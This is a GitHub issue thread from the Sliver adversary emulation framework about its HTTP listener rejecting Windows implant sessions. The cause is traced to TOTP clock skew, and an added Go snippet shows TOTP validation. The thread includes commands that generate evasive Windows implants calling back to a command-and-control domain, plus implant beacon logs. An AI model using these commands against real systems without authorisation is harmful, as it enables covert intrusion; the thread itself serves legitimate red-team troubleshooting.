BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0

HTTP handler not accepting sessions #868

Closed Nariod closed 2 years ago

Nariod commented 2 years ago

Describe the bug: Sliver HTTP handler is not accepting incoming session traffic.

To Reproduce (using Sliver 1.5.26, latest at time of writing):

1. sudo systemctl restart
2. Sliver > http --lport 80
3. Sliver > generate --http http://MY.DOMAIN:80?driver=wininet --evasion --os windows
4. Execute binary on target
5. No session on Sliver
6. Sliver > jobs -K
7. sudo nc -nvlp 80
8. See Sliver session HTTP requests

Expected behavior: HTTP handler accepting Sliver sessions


Additional context: Problem first identified on Kali with an Ubuntu machine as redirector. Installed Sliver on the Ubuntu front machine to confirm the bug.

Nariod commented 2 years ago

After a bit of debugging, it appears that the HTTP Sliver handler is answering with HTTP 404 to implant requests.

emmnoi commented 2 years ago

I have the same problem!

Nariod commented 2 years ago

A bit more debugging: the HTTP beacon for Linux seems functional.

However, the following are not:

generate --http http://MYDOMAIN:80 --evasion --os windows
generate beacon --http http://MYDOMAIN:80 --evasion --os windows
generate --http http://MYDOMAIN:80 --os windows

Conclusion: The problem seems to be specific to Windows implants.

moloch-- commented 2 years ago

Enable debug in the implant (pass the --debug flag to generate) and let us know what the logs look like.

moloch-- commented 2 years ago

It may be your clocks are out of sync and you need to disable TOTP validation in the handler.

Nariod commented 2 years ago

PS C:\Users\nariod\Desktop\Maldev\debug> .\BEAUTIFUL_DUTY.exe
2022/09/14 06:52:55 sliver.go:99: Hello my name is BEAUTIFUL_DUTY
2022/09/14 06:52:55 limits.go:52: Limit checks completed
2022/09/14 06:52:55 sliver.go:117: Running in session mode
2022/09/14 06:52:55 session.go:67: Starting interactive session connection loop ...
2022/09/14 06:52:55 transports.go:41: Starting c2 url generator () ...
2022/09/14 06:52:55 transports.go:87: Return generator: (chan *url.URL)(0xc0001342a0)
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 session.go:84: Next CC = http://MYDOMAIN:80
2022/09/14 06:52:55 session.go:84: Next CC = http://MYDOMAIN:80
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 session.go:172: Connecting -> http(s)://MYDOMAIN:80
2022/09/14 06:52:55 drivers_windows.go:36: Using go http driver
2022/09/14 06:52:55 provider_windows.go:145: [proxy.Provider.readWinHttpProxy] No proxy discovered via AutoDetect: winapi error #12180
2022/09/14 06:52:55 httpclient.go:675: [http] segments = [], filename = admin, ext = php
2022/09/14 06:52:55 crypto.go:190: TOTP Code: 66813256
2022/09/14 06:52:55 httpclient.go:337: [http] POST -> https://MYDOMAIN:80/admin.html?qg=6681w3256&t=52y181998 (106 bytes)
2022/09/14 06:52:56 httpclient.go:343: [http] http response error: Post "https://MYDOMAIN:80/admin.html?qg=6681w3256&t=52y181998": http: server gave HTTP response to HTTPS client
2022/09/14 06:52:56 drivers_windows.go:36: Using go http driver
2022/09/14 06:52:56 provider_windows.go:145: [proxy.Provider.readWinHttpProxy] No proxy discovered via AutoDetect: winapi error #12180
2022/09/14 06:52:56 httpclient.go:675: [http] segments = [oauth php oauth2callback oauth2callback], filename = index, ext = php
2022/09/14 06:52:56 crypto.go:190: TOTP Code: 66813256
2022/09/14 06:52:56 httpclient.go:337: [http] POST -> http://MYDOMAIN:80/oauth/php/oauth2callback/oauth2callback/index.html?c=67256194&hh=6681l3256 (106 bytes)
2022/09/14 06:52:56 httpclient.go:349: [http] non-200 response (404): &{404 Not Found 404 HTTP/1.1 1 1 map[Cache-Control:[no-store, no-cache, must-revalidate] Content-Length:[0] Date:[Wed, 14 Sep 2022 06:54:22 GMT]] 0xc0001b9680 0 [] false false map[] 0xc00011a600 <nil>}
2022/09/14 06:52:56 session.go:178: http(s) connection error send failed
2022/09/14 06:52:56 sliver.go:156: [session] failed to establish connection: send failed
2022/09/14 06:52:56 sliver.go:136: Reconnect sleep: 1m0s

Sliver commands:

moloch-- commented 2 years ago

Try http --disable-otp or https --disable-otp when starting the listener

Nariod commented 2 years ago

Try http --disable-otp or https --disable-otp when starting the listener

Yep, this worked! Thanks for the support :)

realalexandergeorgiev commented 1 year ago

I just had the same issue. Disabling the OTP check was a good workaround, but my time was indeed off by a few minutes. Syncing it solved the issue. Thank you @moloch--
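Added example, not Sliver's own code: a minimal RFC 6238 TOTP check modelled on the listener-side validation the thread ends up diagnosing, showing why an implant whose clock is minutes off gets rejected (Sliver answers 404) while a code from an adjacent 30-second step still passes. The shared secret, HMAC-SHA256, the 30-second step and the one-step skew window are assumptions; the 8-digit code length matches the implant log above.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/binary"
	"fmt"
	"time"
)

const (
	totpStepSeconds = 30          // time step (assumed; RFC 6238 default)
	totpModulus     = 100_000_000 // 8-digit codes, as in the implant log above
	skewSteps       = 1           // accept codes from +-1 adjacent step (assumed)
)

// hotp is RFC 4226 HOTP over a 64-bit counter; HMAC-SHA256 is an assumption.
func hotp(secret []byte, counter uint64) uint32 {
	mac := hmac.New(sha256.New, secret)
	mac.Write(binary.BigEndian.AppendUint64(nil, counter))
	sum := mac.Sum(nil)
	offset := sum[len(sum)-1] & 0x0f // dynamic truncation (RFC 4226 5.3)
	code := binary.BigEndian.Uint32(sum[offset:offset+4]) & 0x7fffffff
	return code % totpModulus
}

// totpCode is the code an implant derives from its own (possibly skewed) clock.
func totpCode(secret []byte, t time.Time) uint32 {
	return hotp(secret, uint64(t.Unix()/totpStepSeconds))
}

// validateTOTP is the listener-side check: accept only codes for the server's current step or a step within skewSteps of it.
func validateTOTP(secret []byte, code uint32, serverNow time.Time) bool {
	current := serverNow.Unix() / totpStepSeconds
	ok := 0
	for d := int64(-skewSteps); d <= skewSteps; d++ {
		ok |= subtle.ConstantTimeEq(int32(code), int32(hotp(secret, uint64(current+d))))
	}
	return ok == 1
}

func main() {
	secret := []byte("constructed shared secret, not a real key")             // constructed
	serverNow := time.Date(2022, 9, 14, 6, 52, 55, 0, time.UTC)            // timestamp from the log
	fmt.Println("in sync:", validateTOTP(secret, totpCode(secret, serverNow), serverNow))                             // true
	fmt.Println("5 min behind:", validateTOTP(secret, totpCode(secret, serverNow.Add(-5*time.Minute)), serverNow)) // false
}
```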